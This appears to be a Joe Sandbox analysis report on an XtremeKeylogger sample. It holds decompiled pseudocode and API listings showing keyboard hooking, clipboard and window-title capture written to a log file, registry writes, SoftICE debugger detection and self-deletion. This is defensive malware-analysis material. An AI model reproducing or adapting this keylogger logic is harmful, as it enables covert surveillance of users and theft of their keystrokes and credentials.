							if( *0xc8b0bc == 1) {
								_t496 = VirtualAlloc(0, E00C81D04(_v40) + _t389, 0x1000, 0x40);
								_push(E00C81D04(_v40) + _t393);
								E00C82914(_t496, E00C81CF4(_v40));
								_t401 = E00C81D04(_v40) + _t400;
								__eflags = _t401;
								_t402 =  *0xc8dee0; // 0xc1f6
								_t403 =  *0xc8b0b8; // 0x0
								PostMessageA(_t403, _t402, _t401, _t496);
							}
						}
						 *0xc8dff4 = 0;
						 *0xc8dff5 = 0;
						goto L28;
					}
				} else {
					if( *0xc8b0c4 != 0) {
						_t485 =  *0xc8b0c4; // 0x0
						UnhookWindowsHookEx(_t485);
					}
					 *0xc8b0c4 = SetWindowsHookExW(0xd, E00C86748, GetModuleHandleA(0), 0);
					L58:
					_pop(_t539);
					 *[fs:eax] = _t539;
					_push(E00C87281);
					E00C81B78( &_v40);
					return E00C81B90( &_v24, 2);
				}
			}

APIs

Part of subcall function 00C85568: ToUnicodeEx.USER32(?,?,?,?,00000100,00000000,?), ref: 00C85E5F
Part of subcall function 00C85568: ToUnicodeEx.USER32(?,?,?,?,00000100,00000000,?), ref: 00C85F06
Part of subcall function 00C85568: MapVirtualKeyW.USER32(0000006E,00000001), ref: 00C85F5C
Part of subcall function 00C85568: MapVirtualKeyW.USER32(0000006E,00000001), ref: 00C85F82
Part of subcall function 00C85568: ToUnicodeEx.USER32(0000006E,00000000,0000006E,00000001,?,?,00000100), ref: 00C85F8A

Part of subcall function 00C8389C: OpenClipboard.USER32 ref: 00C838BD
Part of subcall function 00C8389C: GetClipboardData.USER32(0000000D), ref: 00C838DA
Part of subcall function 00C8389C: GlobalFix.KERNEL32(00000000), ref: 00C838FA
Part of subcall function 00C8389C: GlobalSize.KERNEL32(00000000), ref: 00C83905
Part of subcall function 00C8389C: GlobalUnWire.KERNEL32(00000000), ref: 00C83925
Part of subcall function 00C8389C: CloseClipboard.USER32 ref: 00C83943

Part of subcall function 00C85084: WriteFile.KERNEL32(00000000,?,00000002,?,?), ref: 00C850AA

Part of subcall function 00C86890: GetLocalTime.KERNEL32 ref: 00C86897
Part of subcall function 00C86890: GetDateFormatW.KERNEL32(00000800,00000001,?,00000000,?,000000FF), ref: 00C868B0
Part of subcall function 00C86890: GetTimeFormatW.KERNEL32(00000800,00000008,?,00000000,00000000,000000FF), ref: 00C868E0

DefWindowProcA.USER32(?,?,?,?), ref: 00C8697D
UnhookWindowsHookEx.USER32(00000000), ref: 00C8699C
GetModuleHandleA.KERNEL32(00000000,00000000,00000000,00C8727A), ref: 00C869A5
SetWindowsHookExW.USER32(0000000D,Function_00006748,00000000,00000000), ref: 00C869B3
VirtualFree.KERNEL32(?,00000000,00008000,00000000,00C8727A), ref: 00C86A0A

Part of subcall function 00C868EC: GetForegroundWindow.USER32 ref: 00C86914
Part of subcall function 00C868EC: GetWindowTextW.USER32(00000000,?,00002712), ref: 00C8692A

VirtualAlloc.KERNEL32(00000000,00000000,00001000,00000040,00000000,?,?,?,?,00000000,00008000,00000000,00C8727A), ref: 00C86AE6
PostMessageA.USER32(00000000,0000C1F6,00000000,00000000), ref: 00C86B22
VirtualAlloc.KERNEL32(00000000,00000000,00001000,00000040,00000000,?,00000000,?,?,?,?,00000000,00008000,00000000,00C8727A), ref: 00C86BA6
PostMessageA.USER32(00000000,0000C1F6,00000000,00000000), ref: 00C86BE2
VirtualAlloc.KERNEL32(00000000,00000000,00001000,00000040,00000000,?,00000000,?,00000000,?,00000000,?,?,?,?,00000000), ref: 00C86C73
PostMessageA.USER32(00000000,0000C1F6,00000000,00000000), ref: 00C86CAF
VirtualAlloc.KERNEL32(00000000,00000000,00001000,00000040,00000000,?,00000000,?,00000000,?,00000000,?,00000000,?,?,?), ref: 00C86D0D
PostMessageA.USER32(00000000,0000C1F6,00000000,00000000), ref: 00C86D4B
VirtualAlloc.KERNEL32(00000000,00000000,00001000,00000040,00000000,?,00000000,?,00000000,?,00000000,?,00000000,?,00000000,?), ref: 00C86DA9
PostMessageA.USER32(00000000,0000C1F6,00000000,00000000), ref: 00C86DE5
VirtualAlloc.KERNEL32(00000000,00000000,00001000,00000040,00000000,?,?,?,?,00000000,00008000,00000000,00C8727A), ref: 00C86F3A
PostMessageA.USER32(00000000,0000C1F6,00000000,00000000), ref: 00C86F76

Part of subcall function 00C81BB4: SysReAllocStringLen.OLEAUT32(00C89B88,00C89A90,00000014), ref: 00C81BCA

UnhookWindowsHookEx.USER32(00000000), ref: 00C871D2
SetFilePointer.KERNEL32(00000000,00000000,00000000,00000000,00000000,00C8727A), ref: 00C87220
SetEndOfFile.KERNEL32(00000000,00000000,00000000,00000000,00000000,00000000,00C8727A), ref: 00C8722B

Part of subcall function 00C853EC: RegCreateKeyExW.ADVAPI32(80000001,00000000,00000000,00000000,00000000,00020006,00000000,?,00000000,00C854D4,?,SOFTWARE\,00000000,00C854AA,?,?), ref: 00C8545A
Part of subcall function 00C853EC: RegSetValueExW.ADVAPI32(?,LastSize,00000000,00000004,?,00000004,80000001,00000000,00000000,00000000,00000000,00020006,00000000,?,00000000,00C854D4), ref: 00C85481
Part of subcall function 00C853EC: RegCloseKey.ADVAPI32(?,?,LastSize,00000000,00000004,?,00000004,80000001,00000000,00000000,00000000,00000000,00020006,00000000,?,00000000), ref: 00C8548A

Part of subcall function 00C81B78: SysFreeString.OLEAUT32(00C89A90), ref: 00C81B86

Part of subcall function 00C81B90: SysFreeString.OLEAUT32(?), ref: 00C81BA3

Memory Dump Source

Source File: 00000005.00000002.15179880413.00C80000.00000040.sdmp, Offset: 00C80000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_5_2_c80000_svchost.jbxd

Yara matches

Function 00C83B10, Relevance: 6.0, APIs: 4, Instructions: 49

C-Code - Quality: 30%

			E00C83B10(long __eax) {
				void* _v8;
				void* _v12;
				void* _t15;
				intOrPtr _t25;
				void* _t27;
				void* _t29;
				intOrPtr _t30;

				_t27 = _t29;
				_t30 = _t29 + 0xfffffff8;
				_v8 = 0;
				_v12 = OpenProcess(0x410, 0, __eax);
				if(_v12 == 0) {
					L5:
					return _v8;
				} else {
					_push(_t27);
					_push(0xc83b8b);
					_push( *[fs:eax]);
					 *[fs:eax] = _t30;
					_v8 = VirtualAlloc(0, 0x208, 0x1000, 4);
					_push(0x104);
					_push(_v8);
					_push(0);
					_t15 = _v12;
					_push(_t15);
					L00C83B08();
					if(_t15 != 0) {
						_pop(_t25);
						 *[fs:eax] = _t25;
						_push(E00C83B92);
						return CloseHandle(_v12);
					} else {
						E00C81520();
						goto L5;
					}
				}
			}

APIs

OpenProcess.KERNEL32(00000410,00000000,000000DC), ref: 00C83B23
VirtualAlloc.KERNEL32(00000000,00000208,00001000,00000004,00000000,00C83B8B,?,00000410,00000000,000000DC), ref: 00C83B4D
775C13F0.PSAPI(?,00000000,?,00000104,00000000,00000208,00001000,00000004,00000000,00C83B8B,?,00000410,00000000,000000DC), ref: 00C83B64
CloseHandle.KERNEL32(?), ref: 00C83B85

Memory Dump Source

Source File: 00000005.00000002.15179880413.00C80000.00000040.sdmp, Offset: 00C80000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_5_2_c80000_svchost.jbxd

Yara matches

Function 00C83218, Relevance: 6.0, APIs: 4, Instructions: 48
file

C-Code - Quality: 88%

			E00C83218(WCHAR* __eax, void* __edx, long _a4, intOrPtr _a8) {
				long _v8;
				void* _t13;
				void* _t15;
				void* _t16;

				_t15 = __edx;
				_t13 = 0;
				_t16 = CreateFileW(__eax, 0x40000000, 2, 0, 2, 0, 0);
				if(_t16 != 0xffffffff) {
					if(_a8 == 0 && _a4 == 0xffffffff) {
						SetFilePointer(_t16, 0, 0, 0);
					}
					WriteFile(_t16, _t15, _a4,  &_v8, 0);
					asm("sbb ebx, ebx");
					_t13 = _t13 + 1;
				}
				CloseHandle(_t16);
				return _t13;
			}

0x00c8321f
0x00c83221
0x00c83238
0x00c8323d
0x00c83243
0x00c83252
0x00c83252
0x00c83263
0x00c8326b
0x00c8326d
0x00c8326d
0x00c8326f
0x00c8327b

APIs

CreateFileW.KERNEL32(00000000,40000000,00000002,00000000,00000002,00000000,00000000), ref: 00C83233
SetFilePointer.KERNEL32(00000000,00000000,00000000,00000000,00C8E07C,?,00000000,?,?,00C89E6B,0000181C,00000000,00000000,00000000,00000080,00000000), ref: 00C83252
WriteFile.KERNEL32(00000000,002C6790,?,?,00000000), ref: 00C83263
CloseHandle.KERNEL32(00000000), ref: 00C8326F

Memory Dump Source

Source File: 00000005.00000002.15179880413.00C80000.00000040.sdmp, Offset: 00C80000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_5_2_c80000_svchost.jbxd

Yara matches

Function 00C897F4, Relevance: 6.0, APIs: 4, Instructions: 29
sleep

C-Code - Quality: 92%

			E00C897F4(WCHAR* _a4) {
				void* _t3;
				int _t5;
				WCHAR* _t6;
				WCHAR* _t7;

				_t6 = _a4;
				while(1) {
					_t7 = _t6;
					_t3 = E00C835B0(_t7);
					if(_t3 != 1) {
						break;
					}
					SetFileAttributesW(_t7, 0x80);
					_t5 = DeleteFileW(_t7);
					asm("sbb eax, eax");
					_t3 = _t5 + 1;
					if(_t3 != 1) {
						Sleep(0x3e8);
						continue;
					}
					break;
				}
				ExitProcess(0);
				return _t3;
			}

APIs

Part of subcall function 00C835B0: FindFirstFileW.KERNEL32(00000000), ref: 00C835B9
Part of subcall function 00C835B0: CloseHandle.KERNEL32(00000000), ref: 00C835CA

SetFileAttributesW.KERNEL32(?,00000080), ref: 00C89804
DeleteFileW.KERNEL32(?,?,00000080), ref: 00C8980A
Sleep.KERNEL32(000003E8,?,?,00000080), ref: 00C8981E
ExitProcess.KERNEL32(00000000,?,?,00000080), ref: 00C89832

Memory Dump Source

Source File: 00000005.00000002.15179880413.00C80000.00000040.sdmp, Offset: 00C80000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_5_2_c80000_svchost.jbxd

Yara matches

Function 00C83804, Relevance: 6.0, APIs: 4, Instructions: 23
windowsleep

C-Code - Quality: 100%

			E00C83804(struct tagMSG* __eax) {
				int _t6;
				MSG* _t7;

				_t7 = __eax;
				_t6 = 0;
				if(PeekMessageA(__eax, 0, 0, 0, 1) != 0) {
					_t6 = 1;
					TranslateMessage(_t7);
					DispatchMessageA(_t7);
				}
				Sleep(5);
				return _t6;
			}

0x00c83806
0x00c83808
0x00c8381a
0x00c8381c
0x00c8381f
0x00c83825
0x00c83825
0x00c8382c
0x00c83835

APIs

PeekMessageA.USER32(?,00000000,00000000,00000000,00000001), ref: 00C83813
TranslateMessage.USER32 ref: 00C8381F
DispatchMessageA.USER32 ref: 00C83825
Sleep.KERNEL32(00000005,00000001,?,00C83842), ref: 00C8382C

Memory Dump Source

Source File: 00000005.00000002.15179880413.00C80000.00000040.sdmp, Offset: 00C80000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_5_2_c80000_svchost.jbxd

Yara matches

Function 00C81CD8, Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 26

C-Code - Quality: 29%

			E00C81CD8(void* __eax, void* __ecx, intOrPtr __edx) {
				void* _t5;
				intOrPtr* _t6;
				void* _t7;
				intOrPtr _t19;
				void* _t21;
				void* _t22;
				intOrPtr _t23;
				intOrPtr _t24;
				intOrPtr* _t27;
				intOrPtr _t32;
				intOrPtr* _t34;

				_t23 = __edx;
				_t21 = __ecx;
				_push(__ecx);
				asm("repne scasw");
				if(0 == 0) {
					__ecx =  !__ecx;
				}
				_pop(_t5);
				_t22 = _t21 + _t5;
				_pop(_t6);
				if(_t22 == 0) {
					_t24 =  *_t6;
					if(_t24 != 0) {
						 *_t6 = 0;
						_push(_t6);
						L00C810A0();
						_t7 = _t24;
						return _t7;
					}
					return _t6;
				} else {
					_push(_t6);
					_push(_t22);
					_push(_t23);
					L00C81090();
					if(_t6 == 0) {
						_t23 =  *_t34;
						_t32 = _t23;
						_t19 = 1;
						if( *0xc8c004 != 0) {
							 *0xc8c004();
						}
						if(_t19 != 0) {
							if(_t19 <= 0x18) {
								_t2 = _t19 + 0xc8b050; // 0xc9c8cccb
								_t19 =  *_t2;
							}
						} else {
							_t19 =  *((intOrPtr*)(E00C824B8() + 4));
						}
						return E00C81180(_t32);
					} else {
						_pop(_t27);
						_push( *_t27);
						 *_t27 = _t6;
						L00C810A0();
						return _t6;
					}
				}
			}

APIs

SysFreeString.OLEAUT32(00C89A90), ref: 00C81B86
SysAllocStringLen.OLEAUT32(00000000,00000000), ref: 00C81C77
SysFreeString.OLEAUT32(?), ref: 00C81C89

Strings

%DEFAULTBROWSER%, xrefs: 00C81C76, 00C81C85

Memory Dump Source

Source File: 00000005.00000002.15179880413.00C80000.00000040.sdmp, Offset: 00C80000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_5_2_c80000_svchost.jbxd

Yara matches

Function 00C88804, Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 18

C-Code - Quality: 100%

			E00C88804() {
				void* _t1;
				void* _t4;

				_t4 = 0;
				_t1 = CreateFileA("\\\\.\\SICE", 0xc0000000, 3, 0, 3, 0x80, 0);
				if(_t1 != 0xffffffff) {
					CloseHandle(_t1);
					_t4 = 1;
				}
				return _t4;
			}

0x00c88805
0x00c8881e
0x00c88826
0x00c88829
0x00c8882e
0x00c8882e
0x00c88833

APIs

CreateFileA.KERNEL32(\\.\SICE,C0000000,00000003,00000000,00000003,00000080,00000000), ref: 00C8881E
CloseHandle.KERNEL32(00000000), ref: 00C88829

Strings

\\.\SICE, xrefs: 00C88819

Memory Dump Source

Source File: 00000005.00000002.15179880413.00C80000.00000040.sdmp, Offset: 00C80000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_5_2_c80000_svchost.jbxd

Yara matches

Function 00C88840, Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 18

C-Code - Quality: 100%

			E00C88840() {
				void* _t1;
				void* _t4;

				_t4 = 0;
				_t1 = CreateFileA("\\\\.\\NTICE", 0xc0000000, 3, 0, 3, 0x80, 0);
				if(_t1 != 0xffffffff) {
					CloseHandle(_t1);
					_t4 = 1;
				}
				return _t4;
			}

0x00c88841
0x00c8885a
0x00c88862
0x00c88865
0x00c8886a
0x00c8886a
0x00c8886f

APIs

CreateFileA.KERNEL32(\\.\NTICE,C0000000,00000003,00000000,00000003,00000080,00000000), ref: 00C8885A
CloseHandle.KERNEL32(00000000), ref: 00C88865

Strings

\\.\NTICE, xrefs: 00C88855

Memory Dump Source

Source File: 00000005.00000002.15179880413.00C80000.00000040.sdmp, Offset: 00C80000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_5_2_c80000_svchost.jbxd

Yara matches

Function 00C8387C, Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 15
thread

C-Code - Quality: 75%

			E00C8387C(void* __eax) {
				void* _t5;
				void* _t7;

				_t7 = __eax;
				TerminateThread(__eax, 1);
				asm("sbb ebx, ebx");
				CloseHandle(_t7);
				return _t5 + 1;
			}

0x00c8387e
0x00c83883
0x00c8388b
0x00c8388f
0x00c83898

APIs

TerminateThread.KERNEL32(00000000,00000001,?,XtremeKeylogger,00C878B4,00000000,0000C1F3,00000000,00000000,00000000,00000000,00000000,00000002,00000000,00000007,00000000), ref: 00C83883
CloseHandle.KERNEL32(00000000), ref: 00C8388F

Strings

XtremeKeylogger, xrefs: 00C8387C

Memory Dump Source

Source File: 00000005.00000002.15179880413.00C80000.00000040.sdmp, Offset: 00C80000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_5_2_c80000_svchost.jbxd

Yara matches

Function 00C81C6C, Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 13

C-Code - Quality: 56%

			E00C81C6C(signed int __eax, void* __ecx, void* __edx) {
				void* _t4;
				signed char _t15;
				void* _t18;
				void* _t19;
				void* _t23;

				_t18 = __edx;
				_t3 = __eax;
				if(__ecx == 0) {
					_t19 =  *__eax;
					if(_t19 != 0) {
						 *__eax = 0;
						_push(__eax);
						L00C810A0();
						_t4 = _t19;
						return _t4;
					}
					return __eax;
				} else {
					_push(__eax);
					_push(__ecx);
					_push(__edx);
					L00C81090();
					if(__eax == 0) {
						__eax = __eax & 0x0000007f;
						__edx =  *__esp;
						_t23 = _t18;
						_t15 = _t3 & 0x0000007f;
						if( *0xc8c004 != 0) {
							 *0xc8c004();
						}
						if(_t15 != 0) {
							if(_t15 <= 0x18) {
								_t2 = _t15 + 0xc8b050; // 0xc9c8cccb
								_t15 =  *_t2;
							}
						} else {
							_t15 =  *(E00C824B8() + 4);
						}
						return E00C81180(_t23);
					} else {
						_pop(__edx);
						_push( *__edx);
						 *__edx = __eax;
						L00C810A0();
						return __eax;
					}
				}
			}

APIs

SysFreeString.OLEAUT32(00C89A90), ref: 00C81B86
SysAllocStringLen.OLEAUT32(00000000,00000000), ref: 00C81C77
SysFreeString.OLEAUT32(?), ref: 00C81C89

Strings

%DEFAULTBROWSER%, xrefs: 00C81C76, 00C81C85

Memory Dump Source

Source File: 00000005.00000002.15179880413.00C80000.00000040.sdmp, Offset: 00C80000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_5_2_c80000_svchost.jbxd

Yara matches

Analysis Process: iexplore.exe PID: 3696 Parent PID: 3644

Execution Graph

Execution Coverage:	1.6%
Dynamic/Decrypted Code Coverage:	0%
Signature Coverage:	0.5%
Total number of Nodes:	369
Total number of Limit Nodes:	4

Executed Functions

Function 00C86948, Relevance: 46.2, APIs: 20, Strings: 6, Instructions: 699
windowfile

Control-flow Graph

Executed
Not Executed

C-Code - Quality: 53%

			E00C86948(void* __ebx, void* __edi, void* __esi, struct HWND__* _a4, int _a8, int _a12, long _a16) {
				long _v8;
				char _v12;
				char _v16;
				char _v20;
				char _v24;
				int _v32;
				int _v36;
				char _v40;
				intOrPtr _v44;
				char _v300;
				intOrPtr _v304;
				char _v308;
				char _v830;
				char _v1352;
				long _t143;
				void* _t149;
				void* _t151;
				CHAR* _t153;
				intOrPtr _t156;
				struct HHOOK__* _t159;
				void* _t165;
				void* _t173;
				void* _t174;
				void* _t180;
				void* _t181;
				void* _t190;
				void* _t191;
				void* _t194;
				void* _t200;
				void* _t209;
				void* _t210;
				void* _t219;
				void* _t220;
				void* _t226;
				void* _t235;
				void* _t236;
				int _t241;
				void* _t242;
				intOrPtr _t257;
				int _t260;
				void* _t270;
				void* _t271;
				int _t286;
				int _t287;
				struct HWND__* _t288;
				void* _t297;
				void* _t298;
				void* _t304;
				void* _t313;
				void* _t314;
				void* _t320;
				void* _t321;
				int _t328;
				void* _t330;
				void* _t331;
				void* _t340;
				void* _t341;
				void* _t348;
				void* _t349;
				void* _t358;
				void* _t359;
				void* _t368;
				void* _t369;
				void* _t375;
				void* _t376;
				void* _t385;
				void* _t386;
				int _t401;
				int _t402;
				struct HWND__* _t403;
				int _t415;
				int _t416;
				struct HWND__* _t417;
				int _t432;
				int _t433;
				struct HWND__* _t434;
				int _t449;
				int _t450;
				struct HWND__* _t451;
				struct HHOOK__* _t485;
				int _t488;
				void* _t492;
				signed int _t493;
				long _t494;
				long _t496;
				long _t497;
				long _t498;
				long _t499;
				void* _t504;
				void* _t507;
				void* _t509;
				void* _t510;
				void* _t511;
				void* _t512;
				void* _t513;
				void* _t514;
				void* _t517;
				void* _t519;
				void* _t520;
				void* _t521;
				void* _t524;
				void* _t525;
				void* _t526;
				void* _t527;
				void* _t528;
				void* _t531;
				intOrPtr _t539;
				long _t594;
				void* _t597;
				void* _t599;

				_push(__ebx);
				_push(__esi);
				_push(__edi);
				_v20 = 0;
				_v24 = 0;
				_v40 = 0;
				_t594 = _a16;
				_t592 = _a12;
				_t488 = _a8;
				_push(_t597);
				_push(0xc8727a);
				_push( *[fs:eax]);
				 *[fs:eax] = _t597 + 0xfffffabc;
				_t143 = DefWindowProcA(_a4, _t488, _a12, _t594); // executed
				_v8 = _t143;
				_t599 = _t488 -  *0xc8ded4; // 0xc1f3
				if(_t599 != 0) {
					__eflags = _t488 -  *0xc8decc; // 0xc1f1
					if(__eflags != 0) {
						__eflags = _t488 - 0x308;
						if(_t488 != 0x308) {
							__eflags = _t488 -  *0xc8ded0; // 0xc1f2
							if(__eflags != 0) {
								__eflags = _t488 -  *0xc8ded8; // 0xc1f4
								if(__eflags != 0) {
									__eflags = _t488 -  *0xc8dedc; // 0xc1f5
									if(__eflags == 0) {
										__eflags =  *0xc8dee8;
										if( *0xc8dee8 != 0) {
											_t149 =  *0xc8dee8; // 0xd0
											SetFilePointer(_t149, 0, 0, 0);
											_t151 =  *0xc8dee8; // 0xd0
											SetEndOfFile(_t151);
											 *0xc8b0c8 = 0;
											 *0xc8b0cc = 0;
											__eflags =  *0xc8da4b - 1;
											if( *0xc8da4b == 1) {
												_t153 =  *0xc8b0c8; // 0x0
												E00C853EC(_t153, _t488, _t594);
											}
										}
									}
								} else {
									__eflags =  *0xc8b0c4;
									if( *0xc8b0c4 == 0) {
										_v8 = 0;
									} else {
										_t156 =  *0xc8ded8; // 0xc1f4
										_v8 = _t156 + 1;
									}
								}
							} else {
								__eflags =  *0xc8b0c4;
								if( *0xc8b0c4 != 0) {
									_t159 =  *0xc8b0c4; // 0x0
									UnhookWindowsHookEx(_t159);
								}
								 *0xc8b0c4 = 0;
							}
							goto L57;
						}
						__eflags =  *0xc8b0c4;
						if( *0xc8b0c4 == 0) {
							goto L57;
						}
						__eflags =  *0xc8b0c0 - 1;
						if( *0xc8b0c0 != 1) {
							_v16 = 0xc872d4;
							E00C8291C();
							_t165 = E00C8389C(0,  &_v36,  &_v16);
							__eflags = _t165 - 1;
							if(_t165 != 1) {
								goto L57;
							}
							__eflags = _v32;
							if(__eflags != 0) {
								if(__eflags <= 0) {
									goto L57;
								}
								L42:
								__eflags =  *0xc8dff4;
								if( *0xc8dff4 == 0) {
									E00C81BD8( &_v40, 0xc872cc);
									_push( &_v12);
									_push(0);
									_push(E00C81D04(_v40) + _t232);
									_t235 = E00C81CF4(_v40);
									_t236 =  *0xc8dee8; // 0xd0
									_pop(_t513);
									E00C85084(_t236, _t513, _t235);
									_push( &_v12);
									_push(0);
									_t241 = E00C81D04(_v40) + _t240;
									__eflags = _t241;
									_t242 =  *0xc8dee8; // 0xd0
									_t514 = _t241;
									E00C85084(_t242, _t514, _t235);
								}
								E00C81BD8( &_v40, L"[CLIPBOARD] ---- ");
								_push( &_v12);
								_push(0);
								_push(E00C81D04(_v40) + _t170);
								_t173 = E00C81CF4(_v40);
								_t174 =  *0xc8dee8; // 0xd0
								_pop(_t504);
								E00C85084(_t174, _t504, _t173);
								E00C86890( &_v1352);
								_t180 = E00C82E48( &_v1352);
								_t181 =  *0xc8dee8; // 0xd0
								E00C85084(_t181, _t180 + _t180,  &_v1352, 0,  &_v12);
								E00C81BD8( &_v40, 0xc872cc);
								_push( &_v12);
								_push(0);
								_push(E00C81D04(_v40) + _t187);
								_t190 = E00C81CF4(_v40);
								_t191 =  *0xc8dee8; // 0xd0
								_pop(_t507);
								E00C85084(_t191, _t507, _t190);
								_t194 =  *0xc8dee8; // 0xd0
								E00C85084(_t194, _v36, _v16, 0,  &_v12);
								_push( &_v12);
								_push(0);
								_push(E00C81D04(_v40) + _t198);
								_t200 =  *0xc8dee8; // 0xd0
								_pop(_t509);
								E00C85084(_t200, _t509, _t190);
								E00C81BD8( &_v40, L"[CLIPBOARD END]");
								_push( &_v12);
								_push(0);
								_push(E00C81D04(_v40) + _t206);
								_t209 = E00C81CF4(_v40);
								_t210 =  *0xc8dee8; // 0xd0
								_pop(_t510);
								E00C85084(_t210, _t510, _t209);
								E00C81BD8( &_v40, 0xc872cc);
								_push( &_v12);
								_push(0);
								_push(E00C81D04(_v40) + _t216);
								_t219 = E00C81CF4(_v40);
								_t220 =  *0xc8dee8; // 0xd0
								_pop(_t511);
								E00C85084(_t220, _t511, _t219);
								_push( &_v12);
								_push(0);
								_push(E00C81D04(_v40) + _t224);
								_t226 =  *0xc8dee8; // 0xd0
								_pop(_t512);
								E00C85084(_t226, _t512, _t219);
								 *0xc8dff4 = 0;
								goto L57;
							}
							__eflags = _v36;
							if(_v36 <= 0) {
								goto L57;
							}
							goto L42;
						}
						 *0xc8b0c0 = 0;
					} else {
						E00C8291C();
						E00C81B78( &_v20);
						E00C81B78( &_v24);
						_t492 = _t594;
						E00C82914( &_v308, _t492);
						VirtualFree(_t492, 0, 0x8000);
						E00C868EC( &_v20);
						_t257 =  *0xc8dff8; // 0x0
						E00C81DBC(_t257, _v20);
						_t493 = _t492 & 0xffffff00 | __eflags != 0x00000000;
						__eflags = _t493 - 1;
						if(_t493 == 1) {
							E00C81BB4(0xc8dff8, _v20);
						}
						_t260 = E00C851C4(_v20, _t493, _t592, _t594);
						__eflags = _t260;
						if(_t260 != 0) {
							E00C85568(_t493,  &_v300, _v304, _t592, _t594,  &_v24, _v44);
							__eflags =  *0xc8dee8 - 0xffffffff;
							if( *0xc8dee8 != 0xffffffff) {
								__eflags = _t493 - 1;
								if(_t493 == 1) {
									E00C81BD8( &_v40, 0xc872a4);
									_push( &_v12);
									_push(0);
									_push(E00C81D04(_v40) + _t337);
									_t340 = E00C81CF4(_v40);
									_t341 =  *0xc8dee8; // 0xd0
									_pop(_t525);
									E00C85084(_t341, _t525, _t340);
									_push( &_v12);
									_push(0);
									_push(E00C81D04(_v20) + _t345);
									_t348 = E00C81CF4(_v20);
									_t349 =  *0xc8dee8; // 0xd0
									_pop(_t526);
									E00C85084(_t349, _t526, _t348);
									__eflags =  *0xc8b0b8;
									if( *0xc8b0b8 != 0) {
										__eflags =  *0xc8b0bc - 1;
										if( *0xc8b0bc == 1) {
											_t499 = VirtualAlloc(0, E00C81D04(_v20) + _t437, 0x1000, 0x40);
											_push(E00C81D04(_v20) + _t441);
											E00C82914(_t499, E00C81CF4(_v20));
											_t449 = E00C81D04(_v20) + _t448;
											__eflags = _t449;
											_t450 =  *0xc8dee0; // 0xc1f6
											_t451 =  *0xc8b0b8; // 0x0
											PostMessageA(_t451, _t450, _t449, _t499);
										}
									}
									E00C81BD8( &_v40, 0xc872b0);
									_push( &_v12);
									_push(0);
									_push(E00C81D04(_v40) + _t355);
									_t358 = E00C81CF4(_v40);
									_t359 =  *0xc8dee8; // 0xd0
									_pop(_t527);
									E00C85084(_t359, _t527, _t358);
									E00C81BD8( &_v40, L" --- ");
									_push( &_v12);
									_push(0);
									_push(E00C81D04(_v40) + _t365);
									_t368 = E00C81CF4(_v40);
									_t369 =  *0xc8dee8; // 0xd0
									_pop(_t528);
									E00C85084(_t369, _t528, _t368);
									__eflags =  *0xc8b0b8;
									if( *0xc8b0b8 != 0) {
										__eflags =  *0xc8b0bc - 1;
										if( *0xc8b0bc == 1) {
											_t498 = VirtualAlloc(0, E00C81D04(_v40) + _t420, 0x1000, 0x40);
											_push(E00C81D04(_v40) + _t424);
											E00C82914(_t498, E00C81CF4(_v40));
											_t432 = E00C81D04(_v40) + _t431;
											__eflags = _t432;
											_t433 =  *0xc8dee0; // 0xc1f6
											_t434 =  *0xc8b0b8; // 0x0
											PostMessageA(_t434, _t433, _t432, _t498);
										}
									}
									E00C86890( &_v830);
									_t375 = E00C82E48( &_v830);
									_t376 =  *0xc8dee8; // 0xd0
									E00C85084(_t376, _t375 + _t375,  &_v830, 0,  &_v12);
									__eflags =  *0xc8b0b8;
									if( *0xc8b0b8 != 0) {
										__eflags =  *0xc8b0bc - 1;
										if( *0xc8b0bc == 1) {
											_t497 = VirtualAlloc(0, E00C82E48( &_v830) + _t406, 0x1000, 0x40);
											E00C82E48( &_v830);
											E00C82914(_t497,  &_v830);
											_t415 = E00C82E48( &_v830) + _t414;
											__eflags = _t415;
											_t416 =  *0xc8dee0; // 0xc1f6
											_t417 =  *0xc8b0b8; // 0x0
											PostMessageA(_t417, _t416, _t415, _t497);
										}
									}
									E00C81BD8( &_v40, 0xc872cc);
									_push( &_v12);
									_push(0);
									_push(E00C81D04(_v40) + _t382);
									_t385 = E00C81CF4(_v40);
									_t386 =  *0xc8dee8; // 0xd0
									_pop(_t531);
									E00C85084(_t386, _t531, _t385);
									__eflags =  *0xc8b0b8;
									if( *0xc8b0b8 != 0) {
										__eflags =  *0xc8b0bc - 1;
										if( *0xc8b0bc == 1) {
											_t496 = VirtualAlloc(0, E00C81D04(_v40) + _t389, 0x1000, 0x40);
											_push(E00C81D04(_v40) + _t393);
											E00C82914(_t496, E00C81CF4(_v40));
											_t401 = E00C81D04(_v40) + _t400;
											__eflags = _t401;
											_t402 =  *0xc8dee0; // 0xc1f6
											_t403 =  *0xc8b0b8; // 0x0
											PostMessageA(_t403, _t402, _t401, _t496);
										}
									}
									 *0xc8dff4 = 0;
									 *0xc8dff5 = 0;
								}
								__eflags =  *0xc8dff5 - 1;
								if( *0xc8dff5 == 1) {
									E00C81BD8( &_v40, 0xc872cc);
									_push( &_v12);
									_push(0);
									_push(E00C81D04(_v40) + _t294);
									_t297 = E00C81CF4(_v40);
									_t298 =  *0xc8dee8; // 0xd0
									_pop(_t519);
									E00C85084(_t298, _t519, _t297);
									_push( &_v12);
									_push(0);
									_push(E00C81D04(_v40) + _t302);
									_t304 =  *0xc8dee8; // 0xd0
									_pop(_t520);
									E00C85084(_t304, _t520, _t297);
									E00C81BD8( &_v40, L" --- ");
									_push( &_v12);
									_push(0);
									_push(E00C81D04(_v40) + _t310);
									_t313 = E00C81CF4(_v40);
									_t314 =  *0xc8dee8; // 0xd0
									_pop(_t521);
									E00C85084(_t314, _t521, _t313);
									E00C86890( &_v830);
									_t320 = E00C82E48( &_v830);
									_t321 =  *0xc8dee8; // 0xd0
